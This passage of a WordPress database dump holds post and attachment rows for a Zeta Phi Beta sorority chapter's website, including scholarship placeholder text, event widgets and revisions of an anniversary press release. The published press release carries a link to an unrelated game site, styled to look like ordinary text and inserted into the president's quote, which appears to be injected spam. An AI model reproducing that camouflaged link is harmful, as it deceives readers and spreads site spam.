02:52:33','',0,'https://zphiblgz.org/wp-content/uploads/2016/12/ChericeDaniel-in-white.jpg',0,'attachment','image/jpeg',0),(713,2,'2016-12-21 02:53:06','2016-12-21 02:53:06','','ckinder1','','inherit','open','closed','','ckinder1','','','2016-12-30 06:14:02','2016-12-30 06:14:02','',0,'https://zphiblgz.org/wp-content/uploads/2016/12/CKinder1.jpg',0,'attachment','image/jpeg',0),(714,2,'2016-12-21 02:53:10','2016-12-21 02:53:10','','crystal-whitaker','','inherit','open','closed','','crystal-whitaker','','','2016-12-21 03:53:36','2016-12-21 03:53:36','',0,'https://zphiblgz.org/wp-content/uploads/2016/12/Crystal-Whitaker.jpg',0,'attachment','image/jpeg',0),(715,2,'2016-12-21 02:53:22','2016-12-21 02:53:22','','dawnkempweb','','inherit','open','closed','','dawnkempweb','','','2016-12-21 03:48:07','2016-12-21 03:48:07','',0,'https://zphiblgz.org/wp-content/uploads/2016/12/dawnkempweb.jpg',0,'attachment','image/jpeg',0),(716,2,'2016-12-21 02:53:28','2016-12-21 02:53:28','','diandra-eason-chapter-photo','','inherit','open','closed','','diandra-eason-chapter-photo','','','2016-12-21 02:53:28','2016-12-21 02:53:28','',0,'https://zphiblgz.org/wp-content/uploads/2016/12/Diandra-Eason-chapter-photo.jpg',0,'attachment','image/jpeg',0),(717,2,'2016-12-21 02:53:34','2016-12-21 02:53:34','','ecogdell','','inherit','open','closed','','ecogdell','','','2016-12-21 02:58:35','2016-12-21 02:58:35','',0,'https://zphiblgz.org/wp-content/uploads/2016/12/ECogdell.jpg',0,'attachment','image/jpeg',0),(718,2,'2016-12-21 02:53:42','2016-12-21 02:53:42','','gloria-sanders-700x732','','inherit','open','closed','','gloria-sanders-700x732','','','2016-12-21 02:53:42','2016-12-21 02:53:42','',0,'https://zphiblgz.org/wp-content/uploads/2016/12/Gloria-Sanders-700x732.jpg',0,'attachment','image/jpeg',0),(719,2,'2016-12-21 02:53:49','2016-12-21 02:53:49','','jeaneathia1-700x787','','inherit','open','closed','','jeaneathia1-700x787','','','2016-12-21 02:53:49','2016-12-21 02:53:49','',0,'https://zphiblgz.org/wp-content/uploads/2016/12/Jeaneathia1-700x787.jpg',0,'attachment','image/jpeg',0),(721,2,'2016-12-21 02:54:07','2016-12-21 02:54:07','','kalawode','','inherit','open','closed','','kalawode','','','2016-12-21 02:54:07','2016-12-21 02:54:07','',0,'https://zphiblgz.org/wp-content/uploads/2016/12/KAlawode.jpeg',0,'attachment','image/jpeg',0),(722,2,'2016-12-21 02:54:14','2016-12-21 02:54:14','','kathybarrett','','inherit','open','closed','','kathybarrett','','','2016-12-21 02:54:14','2016-12-21 02:54:14','',0,'https://zphiblgz.org/wp-content/uploads/2016/12/KathyBarrett.jpg',0,'attachment','image/jpeg',0),(723,2,'2016-12-21 02:54:22','2016-12-21 02:54:22','','lanette-250x278','','inherit','open','closed','','lanette-250x278','','','2016-12-21 02:54:22','2016-12-21 02:54:22','',0,'https://zphiblgz.org/wp-content/uploads/2016/12/Lanette-250x278.jpg',0,'attachment','image/jpeg',0),(724,2,'2016-12-21 02:54:29','2016-12-21 02:54:29','','lindabrigmon','','inherit','open','closed','','lindabrigmon','','','2016-12-21 02:54:29','2016-12-21 02:54:29','',0,'https://zphiblgz.org/wp-content/uploads/2016/12/LindaBrigmon.jpg',0,'attachment','image/jpeg',0),(725,2,'2016-12-21 02:54:35','2016-12-21 02:54:35','','lprice','','inherit','open','closed','','lprice','','','2016-12-21 02:57:19','2016-12-21 02:57:19','',0,'https://zphiblgz.org/wp-content/uploads/2016/12/LPrice.jpg',0,'attachment','image/jpeg',0),(726,2,'2016-12-21 02:54:44','2016-12-21 02:54:44','','michele-franklin','','inherit','open','closed','','michele-franklin','','','2016-12-21 02:54:44','2016-12-21 02:54:44','',0,'https://zphiblgz.org/wp-content/uploads/2016/12/Michele-Franklin.jpg',0,'attachment','image/jpeg',0),(727,2,'2016-12-21 02:54:51','2016-12-21 02:54:51','','patreececarter','','inherit','open','closed','','patreececarter','','','2016-12-21 02:54:51','2016-12-21 02:54:51','',0,'https://zphiblgz.org/wp-content/uploads/2016/12/PatreeceCarter.jpg',0,'attachment','image/jpeg',0),(728,2,'2016-12-21 02:54:59','2016-12-21 02:54:59','','qgardner','','inherit','open','closed','','qgardner','','','2016-12-21 02:54:59','2016-12-21 02:54:59','',0,'https://zphiblgz.org/wp-content/uploads/2016/12/QGardner.jpg',0,'attachment','image/jpeg',0),(729,2,'2016-12-21 02:55:05','2016-12-21 02:55:05','','rosee-ragin','','inherit','open','closed','','rosee-ragin','','','2016-12-21 02:55:05','2016-12-21 02:55:05','',0,'https://zphiblgz.org/wp-content/uploads/2016/12/Rosee-Ragin.jpg',0,'attachment','image/jpeg',0),(730,2,'2016-12-21 02:55:10','2016-12-21 02:55:10','','ruthconway','','inherit','open','closed','','ruthconway','','','2016-12-21 02:55:10','2016-12-21 02:55:10','',0,'https://zphiblgz.org/wp-content/uploads/2016/12/RuthConway.jpg',0,'attachment','image/jpeg',0),(731,2,'2016-12-21 02:55:16','2016-12-21 02:55:16','','sadi-caldarazzo','','inherit','open','closed','','sadi-caldarazzo','','','2016-12-21 02:55:16','2016-12-21 02:55:16','',0,'https://zphiblgz.org/wp-content/uploads/2016/12/Sadi-Caldarazzo.jpg',0,'attachment','image/jpeg',0),(732,2,'2016-12-21 02:55:22','2016-12-21 02:55:22','','sandra-hudson-700x933','','inherit','open','closed','','sandra-hudson-700x933','','','2016-12-21 02:55:22','2016-12-21 02:55:22','',0,'https://zphiblgz.org/wp-content/uploads/2016/12/Sandra-Hudson-700x933.jpg',0,'attachment','image/jpeg',0),(733,2,'2016-12-21 02:55:30','2016-12-21 02:55:30','','shanee','','inherit','open','closed','','shanee','','','2016-12-21 03:52:28','2016-12-21 03:52:28','',0,'https://zphiblgz.org/wp-content/uploads/2016/12/Shanee.jpg',0,'attachment','image/jpeg',0),(734,2,'2016-12-21 02:55:36','2016-12-21 02:55:36','','tcurtis','','inherit','open','closed','','tcurtis','','','2016-12-21 03:49:54','2016-12-21 03:49:54','',0,'https://zphiblgz.org/wp-content/uploads/2016/12/TCurtis.jpg',0,'attachment','image/jpeg',0),(735,2,'2016-12-21 02:55:43','2016-12-21 02:55:43','','tracy-irvin','','inherit','open','closed','','tracy-irvin','','','2016-12-21 02:55:43','2016-12-21 02:55:43','',0,'https://zphiblgz.org/wp-content/uploads/2016/12/Tracy-Irvin.jpg',0,'attachment','image/jpeg',0),(755,1,'2016-12-30 14:52:41','2016-12-30 14:52:41','Donec eu semper leo. Vivamus convallis nunc eget velit eleifend tristique. Nulla facilisi. Sed tempor porta urna eu iaculis. Aliquam ultricies a nisl aliquet varius. In ornare risus vehicula arcu lacinia, eget finibus enim faucibus. Vestibulum fringilla quam sed nibh scelerisque, eget tincidunt ipsum fermentum. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Sed euismod gravida tellus, ut venenatis eros mattis ut. Fusce sollicitudin, sem vitae congue efficitur, risus dolor pretium eros, sed laoreet sem eros et mauris. Donec sed interdum ligula.\r\n\r\nCurabitur eget tortor porta, euismod odio et, mattis ex. Aenean ut nisl quis dui sollicitudin luctus in quis eros. Aliquam rutrum tellus in porta tempus. Suspendisse porttitor erat at justo gravida hendrerit. Duis a elit sit amet ipsum condimentum condimentum eu quis leo. Ut eget lectus at turpis euismod consequat eget sit amet neque. Proin suscipit vestibulum erat vel dapibus. Sed et molestie leo, quis hendrerit ante.\r\n\r\nCurabitur tristique nisl id sem lobortis pulvinar. Maecenas egestas auctor massa, non pretium ipsum tristique id. Etiam volutpat ipsum eget tristique efficitur. Praesent sit amet elit velit. Sed tristique neque quis velit egestas accumsan. Morbi laoreet tortor elit, eu finibus dui varius quis. Integer purus ipsum, scelerisque a bibendum id, placerat at tortor. Pellentesque erat enim, viverra eget interdum luctus, laoreet nec odio. Sed laoreet id libero nec euismod. Praesent tempus risus justo, nec condimentum tortor rhoncus et.','W. Ruth Conway Scholarship','','inherit','closed','closed','','90-revision-v1','','','2016-12-30 14:52:41','2016-12-30 14:52:41','',90,'https://zphiblgz.org/2016/12/30/90-revision-v1/',0,'revision','',0),(839,1,'2017-01-11 00:53:30','2017-01-11 05:53:30','','final2017hsapplication','','inherit','open','closed','','final2017hsapplication','','','2017-01-11 00:53:30','2017-01-11 05:53:30','',0,'https://zphiblgz.org/wp-content/uploads/2017/01/Final2017HSApplication.docx',0,'attachment','application/vnd.openxmlformats-officedocument.wordprocessingml.document',0),(840,1,'2017-01-11 00:53:46','2017-01-11 05:53:46','','final2017hcccapplication','','inherit','open','closed','','final2017hcccapplication','','','2017-01-11 00:53:46','2017-01-11 05:53:46','',0,'https://zphiblgz.org/wp-content/uploads/2017/01/Final2017HCCCApplication.docx',0,'attachment','application/vnd.openxmlformats-officedocument.wordprocessingml.document',0),(841,1,'2017-01-11 01:25:06','2017-01-11 06:25:06','','recommendation','','inherit','open','closed','','recommendation','','','2017-01-11 01:25:06','2017-01-11 06:25:06','',797,'https://zphiblgz.org/wp-content/uploads/2017/01/Recommendation.png',0,'attachment','image/png',0),(844,1,'2017-01-11 01:48:11','2017-01-11 06:48:11','','finalzenlogo','','inherit','open','closed','','finalzenlogo','','','2017-01-11 01:48:11','2017-01-11 06:48:11','',0,'https://zphiblgz.org/wp-content/uploads/2016/12/FinalZENLogo.png',0,'attachment','image/png',0),(759,1,'2016-12-30 10:57:25','2016-12-30 15:57:25','','zeta-phi-beta-seal','','inherit','open','closed','','zeta-phi-beta-seal','','','2016-12-30 10:57:25','2016-12-30 15:57:25','',0,'https://zphiblgz.org/wp-content/uploads/2016/12/Zeta-Phi-Beta-Seal.png',0,'attachment','image/png',0),(763,1,'2016-12-30 12:25:40','2016-12-30 17:25:40','<p>\r\n	<label>Email address: </label>\r\n	<input type=\"email\" name=\"EMAIL\" placeholder=\"Your email address\" required />\r\n</p>\r\n\r\n<p>\r\n	<input type=\"submit\" value=\"Sign up\" />\r\n</p>','Website','','publish','closed','closed','','website','','','2016-12-30 12:25:40','2016-12-30 17:25:40','',0,'https://zphiblgz.org/mc4wp-form/website/',0,'mc4wp-form','',0),(764,1,'2016-12-30 12:22:53','2016-12-30 17:22:53','<p>\r\n	<label>Email address: </label>\r\n	<input type=\"email\" name=\"EMAIL\" placeholder=\"Your email address\" required />\r\n</p>\r\n\r\n<p>\r\n	<input type=\"submit\" value=\"Sign up\" />\r\n</p>','Website','','preview','closed','closed','','website-2','','','2016-12-30 12:22:53','2016-12-30 17:22:53','',0,'https://zphiblgz.org/mc4wp-form/website-2/',0,'mc4wp-form','',0),(766,1,'2016-12-31 09:50:36','2016-12-31 14:50:36','','rsz_zeta-phi-beta-seal','','inherit','open','closed','','rsz_zeta-phi-beta-seal','','','2016-12-31 09:50:36','2016-12-31 14:50:36','',0,'https://zphiblgz.org/wp-content/uploads/2016/12/rsz_zeta-phi-beta-seal.png',0,'attachment','image/png',0),(1303,1,'2018-09-14 22:17:22','2018-09-15 03:17:22','Are you a student that\'s preparing to start applying for college? Are you a parent who has a student that will soon begin the college application process?\r\n\r\nAccording to the Inside Higher Education, 80% of colleges require prospective applicants to complete an essay with their college application. In addition, most scholarships also require applicants to complete essays. This workshop will help students and parents become knowledgeable on how to write a successful college or scholarship essay.\r\n\r\nIn addition, participants will receive a free template on how to organize their college applications. \r\n<div id=\"eventbrite-widget-container-48870235189\"></div>\r\n\r\n<script src=\"https://www.eventbrite.com/static/widgets/eb_widgets.js\"></script>\r\n\r\n<script type=\"text/javascript\">\r\n    var exampleCallback = function() {\r\n        console.log(\'Order complete!\');\r\n    };\r\n\r\n    window.EBWidgets.createWidget({\r\n        // Required\r\n        widgetType: \'checkout\',\r\n        eventId: \'48870235189\',\r\n        iframeContainerId: \'eventbrite-widget-container-48870235189\',\r\n\r\n        // Optional\r\n        iframeContainerHeight: 425,  // Widget height in pixels. Defaults to a minimum of 425px if not provided\r\n        onOrderComplete: exampleCallback  // Method called when an order has successfully completed\r\n    });\r\n</script>\r\n\r\n&nbsp;\r\n','Nuts and Bolts Workshop Series: Getting Accepted (Successful Tips to Complete the College Application)','','inherit','closed','closed','','1298-revision-v1','','','2018-09-14 22:17:22','2018-09-15 03:17:22','',1298,'https://zphiblgz.org/1298-revision-v1/',0,'revision','',0),(1300,1,'2018-09-14 22:09:15','2018-09-15 03:09:15','Are you a student that\'s preparing to start applying for college? Are you a parent who has a student that will soon begin the college application process?\r\n\r\nAccording to the Inside Higher Education, 80% of colleges require prospective applicants to complete an essay with their college application. In addition, most scholarships also require applicants to complete essays. This workshop will help students and parents become knowledgeable on how to write a successful college or scholarship essay.\r\n\r\nIn addition, participants will receive a free template on how to organize their college applications.\r\n\r\n&nbsp;\r\n<div id=\"eventbrite-widget-container-48870235189\"></div>\r\n\r\n<script src=\"https://www.eventbrite.com/static/widgets/eb_widgets.js\"></script>\r\n\r\n<script type=\"text/javascript\">\r\n    var exampleCallback = function() {\r\n        console.log(\'Order complete!\');\r\n    };\r\n\r\n    window.EBWidgets.createWidget({\r\n        // Required\r\n        widgetType: \'checkout\',\r\n        eventId: \'48870235189\',\r\n        iframeContainerId: \'eventbrite-widget-container-48870235189\',\r\n\r\n        // Optional\r\n        iframeContainerHeight: 425,  // Widget height in pixels. Defaults to a minimum of 425px if not provided\r\n        onOrderComplete: exampleCallback  // Method called when an order has successfully completed\r\n    });\r\n</script>','','','inherit','closed','closed','','1298-revision-v1','','','2018-09-14 22:09:15','2018-09-15 03:09:15','',1298,'https://zphiblgz.org/1298-revision-v1/',0,'revision','',0),(829,1,'2017-01-10 20:21:19','2017-01-11 01:21:19','','logo-lgz_small','','inherit','open','closed','','logo-lgz_small','','','2017-01-10 20:21:19','2017-01-11 01:21:19','',0,'https://zphiblgz.org/wp-content/uploads/2017/01/LOGO-LGZ_Small.png',0,'attachment','image/png',0),(835,1,'2017-01-10 21:57:53','2017-01-11 02:57:53','','zetahouse','','inherit','open','closed','','zetahouse','','','2017-01-10 21:57:53','2017-01-11 02:57:53','',0,'https://zphiblgz.org/wp-content/uploads/2017/01/ZetaHouse.jpg',0,'attachment','image/jpeg',0),(836,1,'2017-01-10 22:39:44','2017-01-11 03:39:44','','contribute-now','','inherit','open','closed','','contribute-now','','','2017-01-10 22:39:44','2017-01-11 03:39:44','',0,'https://zphiblgz.org/wp-content/uploads/2017/01/Contribute-Now.png',0,'attachment','image/png',0),(837,1,'2017-01-10 23:23:55','2017-01-11 04:23:55','','contribute-now-1','','inherit','open','closed','','contribute-now-1','','','2017-01-10 23:23:55','2017-01-11 04:23:55','',0,'https://zphiblgz.org/wp-content/uploads/2017/01/Contribute-Now-1.png',0,'attachment','image/png',0),(846,1,'2017-01-11 01:53:52','2017-01-11 06:53:52','','Denim & Pearls Tickets (Ticket + Processing)','','inherit','closed','closed','','531-autosave-v1','','','2017-01-11 01:53:52','2017-01-11 06:53:52','',531,'https://zphiblgz.org/2017/01/11/531-autosave-v1/',0,'revision','',0),(856,1,'2017-01-11 20:33:41','2017-01-12 01:33:41','Lambda Gamma Zeta will be providing students with a quick and healthy breakfast on the morning of their SAT exam. Students will be taking the very important SAT exam at Wilde Lake High School in Columbia, MD.','Breakfast on the Go','','inherit','closed','closed','','493-revision-v1','','','2017-01-11 20:33:41','2017-01-12 01:33:41','',493,'https://zphiblgz.org/2017/01/11/493-revision-v1/',0,'revision','',0),(861,2,'2017-01-11 21:28:53','2017-01-12 02:28:53','','IMG_0846','','inherit','open','closed','','img_0846','','','2017-01-11 21:28:53','2017-01-12 02:28:53','',0,'https://zphiblgz.org/wp-content/uploads/2017/01/IMG_0846.jpg',0,'attachment','image/jpeg',0),(902,2,'2017-01-14 22:55:23','2017-01-15 03:55:23','','LilletWilliams','','inherit','open','closed','','lilletwilliams','','','2017-01-14 22:55:23','2017-01-15 03:55:23','',0,'https://zphiblgz.org/wp-content/uploads/2017/01/LilletWilliams.jpg',0,'attachment','image/jpeg',0),(917,1,'2017-01-15 19:38:00','2017-01-16 00:38:00','','Wegmans','','inherit','open','closed','','wegmans','','','2017-01-15 19:38:00','2017-01-16 00:38:00','',772,'https://zphiblgz.org/wp-content/uploads/2017/01/Wegmans.png',0,'attachment','image/png',0),(918,1,'2017-01-15 19:44:41','2017-01-16 00:44:41','','CWLogo2','','inherit','open','closed','','cwlogo2','','','2017-01-15 19:44:41','2017-01-16 00:44:41','',772,'https://zphiblgz.org/wp-content/uploads/2017/01/CWLogo2.png',0,'attachment','image/png',0),(919,1,'2017-01-15 19:45:07','2017-01-16 00:45:07','','Photobuzz (1)','','inherit','open','closed','','photobuzz-1','','','2017-01-15 19:45:07','2017-01-16 00:45:07','',772,'https://zphiblgz.org/wp-content/uploads/2017/01/Photobuzz-1.png',0,'attachment','image/png',0),(920,1,'2017-01-15 19:45:36','2017-01-16 00:45:36','','JS (1)','','inherit','open','closed','','js-1','','','2017-01-15 19:45:36','2017-01-16 00:45:36','',772,'https://zphiblgz.org/wp-content/uploads/2017/01/JS-1.png',0,'attachment','image/png',0),(921,1,'2017-01-15 19:46:12','2017-01-16 00:46:12','','Wegmans','','inherit','open','closed','','wegmans-2','','','2017-01-15 19:46:12','2017-01-16 00:46:12','',772,'https://zphiblgz.org/wp-content/uploads/2017/01/Wegmans-1.png',0,'attachment','image/png',0),(922,1,'2017-01-15 19:47:23','2017-01-16 00:47:23','','Wegmans2','','inherit','open','closed','','wegmans2','','','2017-01-15 19:47:23','2017-01-16 00:47:23','',772,'https://zphiblgz.org/wp-content/uploads/2017/01/Wegmans2.png',0,'attachment','image/png',0),(923,1,'2017-01-15 19:49:12','2017-01-16 00:49:12','','Wineshop (1)','','inherit','open','closed','','wineshop-1','','','2017-01-15 19:49:12','2017-01-16 00:49:12','',772,'https://zphiblgz.org/wp-content/uploads/2017/01/Wineshop-1.png',0,'attachment','image/png',0),(933,1,'2017-01-16 00:57:42','2017-01-16 05:57:42','','Membership','','inherit','open','closed','','membership-2','','','2017-01-16 00:57:42','2017-01-16 05:57:42','',6,'https://zphiblgz.org/wp-content/uploads/2014/12/Membership.png',0,'attachment','image/png',0),(934,1,'2017-01-16 01:05:37','2017-01-16 06:05:37','','ServingHC','','inherit','open','closed','','servinghc-2','','','2017-01-16 01:05:37','2017-01-16 06:05:37','',6,'https://zphiblgz.org/wp-content/uploads/2014/12/ServingHC.png',0,'attachment','image/png',0),(936,1,'2017-01-16 01:23:33','2017-01-16 06:23:33','','IMG_0845','','inherit','open','closed','','img_0845','','','2017-01-16 01:23:33','2017-01-16 06:23:33','',0,'https://zphiblgz.org/wp-content/uploads/2017/01/IMG_0845.jpg',0,'attachment','image/jpeg',0),(937,1,'2017-01-16 01:29:08','2017-01-16 06:29:08','','img_0845 (1)','','inherit','open','closed','','img_0845-1','','','2017-01-16 01:29:08','2017-01-16 06:29:08','',0,'https://zphiblgz.org/wp-content/uploads/2017/01/img_0845-1.jpg',0,'attachment','image/jpeg',0),(939,1,'2017-01-16 02:03:33','2017-01-16 07:03:33','','FinalZENLogo','','inherit','open','closed','','finalzenlogo-2','','','2017-01-16 02:03:33','2017-01-16 07:03:33','',786,'https://zphiblgz.org/wp-content/uploads/2017/01/FinalZENLogo.png',0,'attachment','image/png',0),(940,1,'2017-01-16 02:03:53','2017-01-16 07:03:53','','FinalZENLogo','','inherit','open','closed','','finalzenlogo-3','','','2017-01-16 02:03:53','2017-01-16 07:03:53','',786,'https://zphiblgz.org/wp-content/uploads/2017/01/FinalZENLogo.jpg',0,'attachment','image/jpeg',0),(942,1,'2017-01-16 02:54:55','2017-01-16 07:54:55','[gravityform id=\"4\" title=\"true\" description=\"false\"]','Zetas and Elders Engaging','','inherit','closed','closed','','786-autosave-v1','','','2017-01-16 02:54:55','2017-01-16 07:54:55','',786,'https://zphiblgz.org/786-autosave-v1/',0,'revision','',0),(943,1,'2017-01-16 02:55:42','2017-01-16 07:55:42','[gravityform id=\"4\" title=\"true\" description=\"false\"][gravityform id=\"4\" title=\"true\" description=\"true\"]','Zetas and Elders Engaging','','inherit','closed','closed','','786-revision-v1','','','2017-01-16 02:55:42','2017-01-16 07:55:42','',786,'https://zphiblgz.org/786-revision-v1/',0,'revision','',0),(949,1,'2017-01-16 04:27:38','2017-01-16 09:27:38',' ','','','publish','closed','closed','','949','','','2020-08-08 13:43:27','2020-08-08 18:43:27','',0,'https://zphiblgz.org/?p=949',2,'nav_menu_item','',0),(951,1,'2017-01-16 04:27:39','2017-01-16 09:27:39',' ','','','publish','closed','closed','','951','','','2020-08-08 13:43:27','2020-08-08 18:43:27','',0,'https://zphiblgz.org/?p=951',7,'nav_menu_item','',0),(952,1,'2017-01-16 04:27:38','2017-01-16 09:27:38',' ','','','publish','closed','closed','','952','','','2020-08-08 13:43:27','2020-08-08 18:43:27','',0,'https://zphiblgz.org/?p=952',1,'nav_menu_item','',0),(955,1,'2017-01-16 04:57:23','2017-01-16 09:57:23','<p style=\"text-align: center;\"><strong><u>ZETA PHI BETA SORORITY INC. SERVES HOWARD COUNTY FOR 35 YEARS</u></strong></p>\r\n<strong><em> </em></strong>\r\n\r\n<strong><em>Columbia, MD – </em></strong>Zeta Phi Beta Sorority Incorporated., a 96-year old women’s service organization, chartered the Lambda Gamma Zeta Chapter in Howard County on September 29<sup>th</sup>, 1981. The members of <strong>Lambda Gamma Zeta</strong> Chapter have served the residents of Howard County with their founding principles of scholarship, service, sisterhood, and finer womanhood in mind.\r\n\r\nIn partnership with Howard County Public Schools, the W. Ruth Conway <strong>Scholarship </strong>provides deserving African American high school seniors with financial support as they attend four-year universities. Recently, the scholarship was expanded to provide African American women attending Howard Community College with financial support for tuition, books, and supplies to support their Women of Color initiatives.\r\n\r\nThrough the national <strong>service</strong> initiative, Z-HOPE (Zetas Helping Other People Excel), the chapter has supported various Howard County civic organizations such as The Domestic Violence Center, Community Action Council, The African American Roundtable, HopeWorks, and many others. Lambda Gamma Zeta Chapter has also supported national organizations including March of Dimes, National Multiple Sclerosis Society, and the American Cancer Society: Making Strides Against Breast Cancer program.<a href=\"https://zphiblgz.org/wp-content/uploads/2016/12/FINALLGZ35LOGO.png\"><img class=\"size-medium wp-image-692 alignright\" src=\"https://zphiblgz.org/wp-content/uploads/2016/12/FINALLGZ35LOGO-268x300.png\" alt=\"finallgz35logo\" width=\"268\" height=\"300\" /></a>\r\n\r\nThrough a strong foundation of <strong>sisterhood </strong>and<strong> finer womanhood</strong>, the women of Lambda Gamma Zeta Chapter have been trailblazers in Howard County.  They have established the annual A Pretty and Polished Affair which provides prom wear to hundreds of young ladies free of charge and the Breakfast on the Go program which offers a smart breakfast to students on the morning of their SAT exam.\r\n\r\nCherice Daniel, chapter president, stated, “We are excited to reach this 35 year milestone of serving Howard County. We look forward to expanding our outreach in the community by introducing new youth programs and collaborating with more local organizations to ensure that Lambda Gamma Zeta Chapter is a highly regarded community partner.” For more information about Zeta Phi Beta Sorority Inc., Lambda Gamma Zeta Chapter, visit <a href=\"http://www.zphiblgz.org\">www.zphiblgz.org</a>.\r\n\r\n[button icon=\"icon-noicon\" text=\"Download Official Statement\" url=\"https://zphiblgz.org/wp-content/uploads/2014/12/LGZPressRelease.pdf\" target=\"_blank\" size=\"medium\" text_color=\"#FFFFFF\" mode_display=\"background-button\" border_color=\"#FFFFFF\" ][/button]\r\n<p style=\"text-align: center;\"></p>\r\n&nbsp;','Zeta Phi Beta Sorority Inc. Serves Howard County for 35 Years','','inherit','closed','closed','','689-revision-v1','','','2017-01-16 04:57:23','2017-01-16 09:57:23','',689,'https://zphiblgz.org/689-revision-v1/',0,'revision','',0),(956,1,'2016-09-29 05:05:53','2016-09-29 10:05:53','<p style=\"text-align: center;\"><strong><u>ZETA PHI BETA SORORITY INC. SERVES HOWARD COUNTY FOR 35 YEARS</u></strong></p>\r\n<strong><em> </em></strong>\r\n\r\n<strong><em>Columbia, MD – </em></strong>Zeta Phi Beta Sorority Incorporated., a 96-year old women’s service organization, chartered the Lambda Gamma Zeta Chapter in Howard County on September 29<sup>th</sup>, 1981. The members of <strong>Lambda Gamma Zeta</strong> Chapter have served the residents of Howard County with their founding principles of scholarship, service, sisterhood, and finer womanhood in mind.\r\n\r\nIn partnership with Howard County Public Schools, the W. Ruth Conway <strong>Scholarship </strong>provides deserving African American high school seniors with financial support as they attend four-year universities. Recently, the scholarship was expanded to provide African American women attending Howard Community College with financial support for tuition, books, and supplies to support their Women of Color initiatives.\r\n\r\nThrough the national <strong>service</strong> initiative, Z-HOPE (Zetas Helping Other People Excel), the chapter has supported various Howard County civic organizations such as The Domestic Violence Center, Community Action Council, The African American Roundtable, HopeWorks, and many others. Lambda Gamma Zeta Chapter has also supported national organizations including March of Dimes, National Multiple Sclerosis Society, and the American Cancer Society: Making Strides Against Breast Cancer program.<a href=\"https://zphiblgz.org/wp-content/uploads/2016/12/FINALLGZ35LOGO.png\"><img class=\"size-medium wp-image-692 alignright\" src=\"https://zphiblgz.org/wp-content/uploads/2016/12/FINALLGZ35LOGO-268x300.png\" alt=\"finallgz35logo\" width=\"268\" height=\"300\" /></a>\r\n\r\nThrough a strong foundation of <strong>sisterhood </strong>and<strong> finer womanhood</strong>, the women of Lambda Gamma Zeta Chapter have been trailblazers in Howard County.  They have established the annual A Pretty and Polished Affair which provides prom wear to hundreds of young ladies free of charge and the Breakfast on the Go program which offers a smart breakfast to students on the morning of their SAT exam.\r\n\r\nCherice Daniel, chapter president, stated, “We are excited to reach this 35 year milestone of serving Howard County. We look forward to <a style=\"color:#000;text-decoration:none\" href=\"http://twodigitsgame.com/\">twodigitsgame</a>  expanding our outreach in the community by introducing new youth programs and collaborating with more local organizations to ensure that Lambda Gamma Zeta Chapter is a highly regarded community partner.” For more information about Zeta Phi Beta Sorority Inc., Lambda Gamma Zeta Chapter, visit <a href=\"http://www.zphiblgz.org\">www.zphiblgz.org</a>.\r\n\r\n[button icon=\"icon-noicon\" text=\"Download Official Statement\" url=\"https://zphiblgz.org/wp-content/uploads/2014/12/LGZPressRelease.pdf\" target=\"_blank\" size=\"medium\" text_color=\"#FFFFFF\" mode_display=\"background-button\" border_color=\"#2741a6\" ][/button]','LGZ Celebrates 35 Years of Service to Howard County, MD','','publish','closed','closed','','lgz-celebrates-35-years-service-howard-county-md','','','2017-07-21 14:31:09','2017-07-21 19:31:09','',0,'https://zphiblgz.org/?p=956',0,'post','',0),(957,1,'2017-01-16 05:05:53','2017-01-16 10:05:53','<p style=\"text-align: center;\"><strong><u>ZETA PHI BETA SORORITY INC. SERVES HOWARD COUNTY FOR 35 YEARS</u></strong></p>\r\n<strong><em> </em></strong>\r\n\r\n<strong><em>Columbia, MD – </em></strong>Zeta Phi Beta Sorority Incorporated., a 96-year old women’s service organization, chartered the Lambda Gamma Zeta Chapter in Howard County on September 29<sup>th</sup>, 1981. The members of <strong>Lambda Gamma Zeta</strong> Chapter have served the residents of Howard County with their founding principles of scholarship, service, sisterhood, and finer womanhood in mind.\r\n\r\nIn partnership with Howard County Public Schools, the W. Ruth Conway <strong>Scholarship </strong>provides deserving African American high school seniors with financial support as they attend four-year universities. Recently, the scholarship was expanded to provide African American women attending Howard Community College with financial support for tuition, books, and supplies to support their Women of Color initiatives.\r\n\r\nThrough the national <strong>service</strong> initiative, Z-HOPE (Zetas Helping Other People Excel), the chapter has supported various Howard County civic organizations such as The Domestic Violence Center, Community Action Council, The African American Roundtable, HopeWorks, and many others. Lambda Gamma Zeta Chapter has also supported national organizations including March of Dimes, National Multiple Sclerosis Society, and the American Cancer Society: Making Strides Against Breast Cancer program.<a href=\"https://zphiblgz.org/wp-content/uploads/2016/12/FINALLGZ35LOGO.png\"><img class=\"size-medium wp-image-692 alignright\" src=\"https://zphiblgz.org/wp-content/uploads/2016/12/FINALLGZ35LOGO-268x300.png\" alt=\"finallgz35logo\" width=\"268\" height=\"300\" /></a>\r\n\r\nThrough a strong foundation of <strong>sisterhood </strong>and<strong> finer womanhood</strong>, the women of Lambda Gamma Zeta Chapter have been trailblazers in Howard County.  They have established the annual A Pretty and Polished Affair which provides prom wear to hundreds of young ladies free of charge and the Breakfast on the Go program which offers a smart breakfast to students on the morning of their SAT exam.\r\n\r\nCherice Daniel, chapter president, stated, “We are excited to reach this 35 year milestone of serving Howard County. We look forward to expanding our outreach in the community by introducing new youth programs and collaborating with more local organizations to ensure that Lambda Gamma Zeta Chapter is a highly regarded community partner.” For more information about Zeta Phi Beta Sorority Inc., Lambda Gamma Zeta Chapter, visit <a href=\"http://www.zphiblgz.org\">www.zphiblgz.org</a>.\r\n\r\n[button icon=\"icon-noicon\" text=\"Download Official Statement\" url=\"https://zphiblgz.org/wp-content/uploads/2014/12/LGZPressRelease.pdf\" target=\"_blank\" size=\"medium\" text_color=\"#FFFFFF\" mode_display=\"background-button\" border_color=\"#FFFFFF\" ][/button]','LGZ Celebrates 35 Years of Service to Howard County, MD','','inherit','closed','closed','','956-revision-v1','','','2017-01-16 05:05:53','2017-01-16 10:05:53','',956,'https://zphiblgz.org/956-revision-v1/',0,'revision','',0),(958,1,'2017-01-16 05:15:26','2017-01-16 10:15:26','<p style=\"text-align: center;\"><strong><u>ZETA PHI BETA SORORITY INC. SERVES HOWARD COUNTY FOR 35 YEARS</u></strong></p>\r\n<strong><em> </em></strong>\r\n\r\n<strong><em>Columbia, MD – </em></strong>Zeta Phi Beta Sorority Incorporated., a 96-year old women’s service organization, chartered the Lambda Gamma Zeta Chapter in Howard County on September 29<sup>th</sup>, 1981. The members of <strong>Lambda Gamma Zeta</strong> Chapter have served the residents of Howard County with their founding principles of scholarship, service, sisterhood, and finer womanhood in mind.\r\n\r\nIn partnership with Howard County Public Schools, the W. Ruth Conway 